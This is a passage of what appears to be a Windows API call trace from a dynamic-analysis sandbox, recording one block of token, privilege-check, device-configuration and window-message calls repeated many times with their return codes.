pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.776] GetLastError () returned 0x578 [0084.776] SetLastError (dwErrCode=0x578) [0084.776] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.776] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.776] GetCurrentThread () returned 0xfffffffe [0084.776] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.776] GetLastError () returned 0x3f0 [0084.776] GetCurrentProcess () returned 0xffffffff [0084.776] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.776] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.776] SetLastError (dwErrCode=0x522) [0084.776] CloseHandle (hObject=0x114) returned 1 [0084.776] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.776] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.776] GetLastError () returned 0x578 [0084.776] SetLastError (dwErrCode=0x578) [0084.776] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.776] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.776] GetCurrentThread () returned 0xfffffffe [0084.776] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.776] GetLastError () returned 0x3f0 [0084.776] GetCurrentProcess () returned 0xffffffff [0084.776] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.776] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.776] SetLastError (dwErrCode=0x522) [0084.776] CloseHandle (hObject=0x114) returned 1 [0084.777] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.777] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.777] GetLastError () returned 0x578 [0084.777] SetLastError (dwErrCode=0x578) [0084.777] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.777] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.777] GetCurrentThread () returned 0xfffffffe [0084.777] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.777] GetLastError () returned 0x3f0 [0084.777] GetCurrentProcess () returned 0xffffffff [0084.777] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.777] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.777] SetLastError (dwErrCode=0x522) [0084.777] CloseHandle (hObject=0x114) returned 1 [0084.777] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.777] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.777] GetLastError () returned 0x578 [0084.777] SetLastError (dwErrCode=0x578) [0084.777] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.777] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.777] GetCurrentThread () returned 0xfffffffe [0084.777] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.777] GetLastError () returned 0x3f0 [0084.777] GetCurrentProcess () returned 0xffffffff [0084.777] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.777] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.777] SetLastError (dwErrCode=0x522) [0084.777] CloseHandle (hObject=0x114) returned 1 [0084.777] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.777] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.777] GetLastError () returned 0x578 [0084.777] SetLastError (dwErrCode=0x578) [0084.777] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.777] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.777] GetCurrentThread () returned 0xfffffffe [0084.778] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.778] GetLastError () returned 0x3f0 [0084.778] GetCurrentProcess () returned 0xffffffff [0084.778] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.778] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.778] SetLastError (dwErrCode=0x522) [0084.778] CloseHandle (hObject=0x114) returned 1 [0084.778] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.778] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.778] GetLastError () returned 0x578 [0084.778] SetLastError (dwErrCode=0x578) [0084.778] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.778] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.778] GetCurrentThread () returned 0xfffffffe [0084.778] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.778] GetLastError () returned 0x3f0 [0084.778] GetCurrentProcess () returned 0xffffffff [0084.778] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.778] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.778] SetLastError (dwErrCode=0x522) [0084.778] CloseHandle (hObject=0x114) returned 1 [0084.778] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.778] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.778] GetLastError () returned 0x578 [0084.778] SetLastError (dwErrCode=0x578) [0084.778] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.778] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.778] GetCurrentThread () returned 0xfffffffe [0084.778] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.778] GetLastError () returned 0x3f0 [0084.778] GetCurrentProcess () returned 0xffffffff [0084.778] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.778] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.778] SetLastError (dwErrCode=0x522) [0084.778] CloseHandle (hObject=0x114) returned 1 [0084.778] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.778] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.778] GetLastError () returned 0x578 [0084.778] SetLastError (dwErrCode=0x578) [0084.778] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.778] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.778] GetCurrentThread () returned 0xfffffffe [0084.778] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.778] GetLastError () returned 0x3f0 [0084.778] GetCurrentProcess () returned 0xffffffff [0084.779] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.779] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.779] SetLastError (dwErrCode=0x522) [0084.779] CloseHandle (hObject=0x114) returned 1 [0084.779] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.779] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.779] GetLastError () returned 0x578 [0084.779] SetLastError (dwErrCode=0x578) [0084.779] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.779] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.779] GetCurrentThread () returned 0xfffffffe [0084.779] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.779] GetLastError () returned 0x3f0 [0084.779] GetCurrentProcess () returned 0xffffffff [0084.779] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.779] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.779] SetLastError (dwErrCode=0x522) [0084.779] CloseHandle (hObject=0x114) returned 1 [0084.779] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.779] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.779] GetLastError () returned 0x578 [0084.779] SetLastError (dwErrCode=0x578) [0084.779] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.779] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.779] GetCurrentThread () returned 0xfffffffe [0084.779] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.779] GetLastError () returned 0x3f0 [0084.779] GetCurrentProcess () returned 0xffffffff [0084.779] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.779] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.779] SetLastError (dwErrCode=0x522) [0084.779] CloseHandle (hObject=0x114) returned 1 [0084.779] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.779] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.779] GetLastError () returned 0x578 [0084.779] SetLastError (dwErrCode=0x578) [0084.779] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.779] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.779] GetCurrentThread () returned 0xfffffffe [0084.779] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.779] GetLastError () returned 0x3f0 [0084.779] GetCurrentProcess () returned 0xffffffff [0084.780] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.780] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.780] SetLastError (dwErrCode=0x522) [0084.780] CloseHandle (hObject=0x114) returned 1 [0084.780] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.780] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.780] GetLastError () returned 0x578 [0084.780] SetLastError (dwErrCode=0x578) [0084.780] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.780] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.780] GetCurrentThread () returned 0xfffffffe [0084.780] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.780] GetLastError () returned 0x3f0 [0084.780] GetCurrentProcess () returned 0xffffffff [0084.780] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.780] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.780] SetLastError (dwErrCode=0x522) [0084.780] CloseHandle (hObject=0x114) returned 1 [0084.780] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.780] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.780] GetLastError () returned 0x578 [0084.780] SetLastError (dwErrCode=0x578) [0084.780] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.780] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.780] GetCurrentThread () returned 0xfffffffe [0084.780] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.780] GetLastError () returned 0x3f0 [0084.780] GetCurrentProcess () returned 0xffffffff [0084.780] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.780] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.780] SetLastError (dwErrCode=0x522) [0084.780] CloseHandle (hObject=0x114) returned 1 [0084.780] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.780] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.780] GetLastError () returned 0x578 [0084.780] SetLastError (dwErrCode=0x578) [0084.780] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.780] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.780] GetCurrentThread () returned 0xfffffffe [0084.780] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.780] GetLastError () returned 0x3f0 [0084.780] GetCurrentProcess () returned 0xffffffff [0084.780] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.781] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.781] SetLastError (dwErrCode=0x522) [0084.781] CloseHandle (hObject=0x114) returned 1 [0084.781] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.781] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.781] GetLastError () returned 0x578 [0084.781] SetLastError (dwErrCode=0x578) [0084.781] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.781] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.781] GetCurrentThread () returned 0xfffffffe [0084.781] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.781] GetLastError () returned 0x3f0 [0084.781] GetCurrentProcess () returned 0xffffffff [0084.781] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.781] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.781] SetLastError (dwErrCode=0x522) [0084.781] CloseHandle (hObject=0x114) returned 1 [0084.781] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.781] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.781] GetLastError () returned 0x578 [0084.781] SetLastError (dwErrCode=0x578) [0084.781] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.781] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.781] GetCurrentThread () returned 0xfffffffe [0084.781] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.781] GetLastError () returned 0x3f0 [0084.781] GetCurrentProcess () returned 0xffffffff [0084.781] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.781] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.781] SetLastError (dwErrCode=0x522) [0084.781] CloseHandle (hObject=0x114) returned 1 [0084.781] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.781] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.781] GetLastError () returned 0x578 [0084.781] SetLastError (dwErrCode=0x578) [0084.781] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.781] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.781] GetCurrentThread () returned 0xfffffffe [0084.781] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.781] GetLastError () returned 0x3f0 [0084.781] GetCurrentProcess () returned 0xffffffff [0084.781] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.782] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.782] SetLastError (dwErrCode=0x522) [0084.782] CloseHandle (hObject=0x114) returned 1 [0084.782] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.782] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.782] GetLastError () returned 0x578 [0084.782] SetLastError (dwErrCode=0x578) [0084.782] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.782] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.782] GetCurrentThread () returned 0xfffffffe [0084.782] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.782] GetLastError () returned 0x3f0 [0084.782] GetCurrentProcess () returned 0xffffffff [0084.782] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.782] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.782] SetLastError (dwErrCode=0x522) [0084.782] CloseHandle (hObject=0x114) returned 1 [0084.782] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.782] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.782] GetLastError () returned 0x578 [0084.782] SetLastError (dwErrCode=0x578) [0084.782] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.782] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.782] GetCurrentThread () returned 0xfffffffe [0084.782] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.782] GetLastError () returned 0x3f0 [0084.782] GetCurrentProcess () returned 0xffffffff [0084.782] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.782] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.782] SetLastError (dwErrCode=0x522) [0084.782] CloseHandle (hObject=0x114) returned 1 [0084.782] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.782] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.782] GetLastError () returned 0x578 [0084.782] SetLastError (dwErrCode=0x578) [0084.782] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.782] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.782] GetCurrentThread () returned 0xfffffffe [0084.782] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.782] GetLastError () returned 0x3f0 [0084.783] GetCurrentProcess () returned 0xffffffff [0084.783] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.783] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.783] SetLastError (dwErrCode=0x522) [0084.783] CloseHandle (hObject=0x114) returned 1 [0084.783] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.783] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.783] GetLastError () returned 0x578 [0084.783] SetLastError (dwErrCode=0x578) [0084.783] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.783] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.783] GetCurrentThread () returned 0xfffffffe [0084.783] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.783] GetLastError () returned 0x3f0 [0084.783] GetCurrentProcess () returned 0xffffffff [0084.783] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.783] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.783] SetLastError (dwErrCode=0x522) [0084.783] CloseHandle (hObject=0x114) returned 1 [0084.783] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.783] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.783] GetLastError () returned 0x578 [0084.783] SetLastError (dwErrCode=0x578) [0084.783] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: 